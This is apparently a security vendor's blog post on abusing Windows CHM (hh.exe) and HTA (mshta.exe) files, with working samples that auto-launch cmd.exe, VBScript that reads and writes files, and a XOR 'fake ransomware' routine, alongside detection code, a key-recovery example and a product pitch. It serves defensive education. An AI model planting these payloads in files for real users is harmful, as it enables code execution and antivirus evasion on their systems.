Hide malware through Microsoft HTML interpreters

In this article we will see how Microsoft Compiled HTML Help (CHM) and HTML Application (HTA) files can be used to build malware that compromises a system through legitimate Microsoft tools.

A CHM file is a binary file containing a collection of HTML pages, intended to provide a user guide for a tool or piece of software. CHM files are interpreted by the program “hh.exe” (C:\Windows\hh.exe or C:\Windows\SysWOW64\hh.exe), which has been natively included in Windows since 1994 and is still present in Windows 10.

An HTA file is a program whose source code is based on HTML and which provides a web page as its user interface. HTA files are interpreted by an Internet Explorer instance hosted by “mshta.exe” (C:\Windows\System32\mshta.exe or C:\Windows\SysWOW64\mshta.exe). It was introduced in Windows in 1999 and is still present in Windows 10.

These files are rarely used for legitimate purposes but can easily be used to damage or infect a system. Both CHM and HTA files are able to interpret VBScript and JScript, which may lead to arbitrary code execution. Let’s see how.

Arbitrary code execution using CHM file

Example of a benign file

In order to create a CHM file, we need to download and install HTML Help Workshop.
Then launch the HTML Help Workshop tool, click on New project and select an already created directory to hold your project.

[Screenshot: creating a new project in HTML Help Workshop]

Within the project directory, create a .htm file and add it to your project by clicking on “Add/Remove topic files”.

[Screenshot: adding the .htm topic file to the project]

In the tool, double-click the created .htm file to edit it, then insert the code below to create a basic help file:

<html>
<head>
<title> SAFE-Cyberdefense </title>
</head>
<body>
<h2 align=center> CHM Example </h2>
<h3 align=center> This is a help file </h3>
</body>
</html>

Compile the project by clicking on File → Compile.

[Screenshot: compiling the project]

A CHM file appears in the project folder. Double-click it to see the result:

[Screenshot: the compiled help file opened in hh.exe]

Example of a malicious CHM file

In the following example, we create a button object that starts cmd.exe when it is clicked. In addition to the object, we add a script that clicks the button automatically when the document is opened.
The following code creates a CHM file that starts a cmd.exe process:

<html>
<head>
<title> SAFE-Cyberdefense </title>
</head>
<body>

<!-- HTML Help ActiveX control: the "ShortCut" command runs the program named in Item1 -->
<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<!-- Auto-click the hidden button as soon as the page is loaded -->
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> CHM Example </h2>
<h3 align=center> This is a malicious CHM file </h3>
</body>
</html>

When you double-click the CHM file, a cmd.exe spawns as a child of hh.exe, the interpreter of the CHM binary file:

[Screenshot: Process Explorer showing cmd.exe as a child of hh.exe]

The started process could just as well be a PowerShell command line that downloads a malicious payload, or any other tool or malware present on the system.

Arbitrary code execution using HTA file

Example of a benign HTA file

To implement an HTA file, create a file with the .hta extension and insert your code in it:

<html>
<head>
<title> SAFE-Cyberdefense </title>
</head>
<body>

<h2 align=center> HTA Example </h2>
<h3 align=center> This is a help file </h3>
</body>
</html>

This time the code is not compiled: mshta.exe opens it directly, since it is the default application associated with .hta files. Double-click the HTA file to see the result:

[Screenshot: the HTA file opened by mshta.exe]

Example of a malicious HTA file

For the HTA file we use VBScript instead of JScript (this works with CHM as well). The following code creates a WScript.Shell object that starts cmd.exe automatically:

<html>
<head>
<title> SAFE-Cyberdefense </title>
</head>
<body>

<script language="VBScript">
' WScript.Shell exposes Run, which starts a new process as soon as the page loads
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe"
</script>

<h2 align=center> HTA Example </h2>
<h3 align=center> This is a malicious HTA file </h3>
</body>
</html>

We can see that mshta.exe started a cmd.exe when the HTML application was opened:

[Screenshot: Process Explorer showing cmd.exe as a child of mshta.exe]

As in the CHM example, it could be any other executable on the machine, or a PowerShell command with specific parameters that starts a malicious payload.
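
The two process trees shown above (hh.exe spawning cmd.exe, mshta.exe spawning cmd.exe) are exactly what a defender can alert on. The following Python is an added example, not code from the original article or from SAFE: it parses a few constructed process-creation records (shaped like flattened Sysmon event fields) and flags shells or script hosts spawned by the CHM/HTA interpreters. The field names and sample paths are assumptions.

```python
import re
from dataclasses import dataclass

# Interpreters discussed on the page (hh.exe for CHM, mshta.exe for HTA). In normal
# use they render help pages; they should almost never be the parent of a shell.
SUSPECT_PARENTS = {"hh.exe", "mshta.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Assumed record layout: key=value fields, CommandLine quoted (constructed, not a real sensor format)
EVENT_RE = re.compile(
    r'ParentImage=(?P<parent>\S+)\s+Image=(?P<image>\S+)\s+CommandLine="(?P<cmd>[^"]*)"'
)

# Constructed sample events: one benign CHM open, two interpreter-spawned shells, one normal shell.
SAMPLE_LOG = """\
ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\hh.exe CommandLine="hh.exe guide.chm"
ParentImage=C:\\Windows\\hh.exe Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe"
ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe"
ParentImage=C:\\Windows\\System32\\mshta.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell.exe"
"""

@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str

def image_name(path):
    """Lower-cased file name of a Windows path, e.g. C:\\Windows\\hh.exe -> hh.exe."""
    return path.rsplit("\\", 1)[-1].lower()

def parse_events(log):
    """Turn the flattened log text into ProcessEvent records, skipping unparsable lines."""
    events = []
    for line in log.splitlines():
        match = EVENT_RE.search(line)
        if match:
            events.append(ProcessEvent(match["parent"], match["image"], match["cmd"]))
    return events

def suspicious_spawns(events):
    """Return the events where a CHM/HTA interpreter is the parent of a shell or script host."""
    return [
        e for e in events
        if image_name(e.parent_image) in SUSPECT_PARENTS
        and image_name(e.image) in SHELL_CHILDREN
    ]

if __name__ == "__main__":
    for hit in suspicious_spawns(parse_events(SAMPLE_LOG)):
        print(f"ALERT {image_name(hit.parent_image)} -> {image_name(hit.image)}: {hit.command_line}")
```

The same parent/child rule maps directly onto a Sysmon Event ID 1 or Windows 4688 query in a SIEM; the image-name comparison (rather than full path) also catches the SysWOW64 copies of both interpreters mentioned earlier.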

Hide malicious actions behind VBScript

As we saw before, it is easy to craft a dropper using CHM and HTA files. But since both allow the execution of VBScript and JScript, many more actions can be performed on the system for malicious purposes. As an example, VBScript can be used to read and modify files on disk. The following code reads the content of an existing file (“C:\source_file.txt”) and writes it into another file created on the desktop:

Set fso = CreateObject("Scripting.FileSystemObject")
' Open the source for reading (1 = ForReading) and slurp its content
Set file = fso.OpenTextFile("C:\source_file.txt", 1)
content = file.ReadAll
file.Close

' Create the destination (True = overwrite if present, True = Unicode) and write the content
Set f = fso.CreateTextFile("C:\Users\admin\Desktop\destination_file.txt", True, True)
f.WriteLine(content)
f.Close

Since this type of action requires some ActiveX features, a warning pop-up is displayed to the user:

[Screenshot: ActiveX warning pop-up displayed by hh.exe]

If the user accepts the pop-up, the read/write operations are performed by “hh.exe” on the target file:

[Screenshot: hh.exe reading the source file and writing the destination file]

With the same code in the HTA, no warning appears. The file is read and written by “mshta.exe” without any pop-up:

[Screenshot: mshta.exe reading the source file and writing the destination file]

Thanks to VBScript’s flexibility, it is possible to craft a fully standalone ransomware just by adding a cryptographic implementation to the previous sample.
The following code simulates a cryptographic operation to create a fake ransomware:

' Repeating-key XOR: each character of content is XORed with the next character of key,
' wrapping around when the end of the key is reached. Applying it twice restores the input.
Function encrypt(content, contentSize, key, keySize)
    Dim keyPos, i, nc, nk, c, newContent
    newContent = ""
    keyPos = 1
    For i = 1 To contentSize
        nc = Asc(Mid(content, i, 1))   ' code of the current plaintext character
        nk = Asc(Mid(key, keyPos, 1))  ' code of the current key character
        c = nc Xor nk
        newContent = newContent & Chr(c)
        keyPos = keyPos + 1
        If keyPos > keySize Then keyPos = 1
    Next
    encrypt = newContent
End Function
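
The function above is a repeating-key XOR, which is why the article calls it a fake ransomware: the same routine decrypts, and a responder who knows a few bytes of any victim file (most formats start with a fixed header) can recover the key without the attacker's cooperation. The following Python is an added example, not code from the article or from SAFE; it re-implements the VBScript operation on bytes and shows the recovery. The sample file and key are constructed.

```python
def xor_repeating_key(data, key):
    """Byte-for-byte equivalent of the VBScript encrypt(): data[i] XOR key[i mod len(key)].

    XOR is its own inverse, so calling this again with the same key decrypts.
    """
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(ciphertext, known_prefix, key_size):
    """Recover the whole repeating key from known plaintext covering at least key_size bytes.

    ciphertext[i] XOR plaintext[i] gives key[i mod key_size], so one key period of known
    plaintext (e.g. a file format's magic header) yields the full key.
    """
    if len(known_prefix) < key_size or len(ciphertext) < key_size:
        raise ValueError("need at least key_size bytes of ciphertext and known plaintext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_size], known_prefix[:key_size]))

# Constructed sample: a PDF-like document (fixed "%PDF-1.7" header) and a short key.
# Both are invented for this example; the page's script does not fix a key.
SAMPLE_FILE = b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n"
SAMPLE_KEY = b"s3cr3t"
PDF_MAGIC = b"%PDF-1.7\n"

def demo():
    """'Encrypt' the sample, then recover the key from the header alone and decrypt."""
    locked = xor_repeating_key(SAMPLE_FILE, SAMPLE_KEY)
    guessed_key = recover_key(locked, PDF_MAGIC, len(SAMPLE_KEY))
    return guessed_key, xor_repeating_key(locked, guessed_key)

if __name__ == "__main__":
    key, plain = demo()
    print("recovered key:", key, "| decrypted OK:", plain == SAMPLE_FILE)
```

When the key length is unknown, a responder tries increasing lengths until the decrypted header matches the expected file format; a genuine ransomware would use a proper cipher with a per-victim key, which is what makes the real 2017 samples cited below dangerous and this sample merely a demonstration.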

This kind of attack is currently not detected by antivirus products, since signature detection is hard to match on a scripting language. The code can also be obfuscated to make signature detection even more difficult.

[Screenshot: no antivirus engine detects the HTA file]

VBScript is a powerful scripting language that also permits downloading data to create a dropper (VBS Download File), or loading system DLLs to call Windows APIs and execute malicious code in memory.

In 2017, some cyberattacks are still based on this type of file, like the Brazilian Banking Trojan or the Spora Ransomware, but unfortunately Microsoft has not announced any security improvement for these HTML interpreters, and antivirus products are still weak against this type of malware.

How SAFE Endpoint blocks CHM/HTA based attacks

SAFE Endpoint Security is a multi-layer security product that blocks this type of attack or malicious file using multiple methods, at each step of the attack:

  • SAFE Endpoint Security limits access to some administrative tools (like cmd.exe, powershell.exe, mshta.exe, hh.exe, …)
  • Thanks to the data protection feature, SAFE Endpoint Security keeps your data safe by blocking undesirable access to it.
  • Thanks to the security policies, applications and programs have limited access to the network. This feature helps prevent droppers and data exfiltration.

In the following video, the fake ransomware we crafted previously encrypts some personal data. SAFE Endpoint Security is set to detection mode in order to show the different blocked steps of the attack:

[Video: SAFE Endpoint Security blocking the HTA malware]

Conclusion

VBScript interpreters can be dangerous because they give access to Windows objects from a web page and allow launching programs, reading and writing files, and much more. Like the DDE feature, these interpreters (“hh.exe” and “mshta.exe”) are legitimate tools that are part of the Windows OS, which is why it is more difficult for a traditional antivirus to catch this kind of attack. Signature-based detection software can only try to detect the malicious CHM or HTA source code, but since it is HTML-based, it can easily be obfuscated to bypass signature detection.
As we saw, SAFE Endpoint Security provides different ways to prevent CHM- and HTA-based cyberattacks, but as a workaround it is also possible to limit this type of attack by setting Notepad as the default program for opening CHM and HTA files.